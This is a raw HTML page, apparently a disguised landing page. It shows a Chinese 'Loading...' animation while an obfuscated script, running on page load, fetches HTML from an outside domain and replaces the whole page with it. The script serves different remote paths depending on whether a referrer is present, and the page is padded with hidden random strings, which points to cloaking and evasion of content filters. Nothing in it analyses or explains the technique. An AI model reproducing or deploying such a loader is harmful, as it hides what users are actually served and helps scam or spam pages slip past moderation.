<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .mZQVyt {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .mZQVyt .zcTuVvvBiJM {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .mZQVyt .content {
            line-height: 50px;
            text-align: center
        }

        .mZQVyt .img {
            width: 100%
        }

        .mZQVyt .n2ODEg {
            text-align: center
        }

        .mZQVyt .n2ODEg span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .mZQVyt .n2ODEg span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .mZQVyt .n2ODEg span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .mZQVyt .n2ODEg span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .mZQVyt .n2ODEg span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .mZQVyt .n2ODEg span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .mZQVyt .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function CgBzvK2R3Q(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var FO6evd = CgBzvK2R3Q('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ FO6evd +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ FO6evd +".html?a=share";
		}
		
        kL2HFBI=url+"#"+new Date().getTime();
        kL2HFBI && function() {
            $.get(kL2HFBI, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<img  src='' style='display:none'>
<div style='display:none'>qrSjpDEnSz0i5pmuzaUStwkNdoQdwGpimqLJ0DyCMGW2D8vdsn</div>
<b style='display:none' >VQ7MB7uFaryGHWQhCpka4TITBBhPdleQ2zkzsWzJlFf0XnJekVRQ6PEsrZ</b><div class="mZQVyt">
    <div class="zcTuVvvBiJM">
        <div class="n2ODEg">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<p  style='display:none'>QKNUtq0ugjqn1WgrXaijeR</p>
<img  src='' style='display:none'>
<a  href='#' style='display:none'>BAmNc2o3q9CYgwbJ67OlMg9SNeXPwcaenYeE85yLwsC</a>
<img  src='' style='display:none'>
<ul style='display:none' >HSjFz7Aj7Y45MOp7qrrnIeM2HFMqG3PLLaXWQkOsLNZpyE4MEAhd6vsjyxoVXYKxb2IUccbpXtgX7nKAhYhxILDT0u2a</ul>
<b style='display:none' >JO7HelkQd0v8KvEkRVZMWortJ93bsrQadS5vtBRKkt1PUXz8pEYLnqpg0aB1rm32sj</b></body>
</html>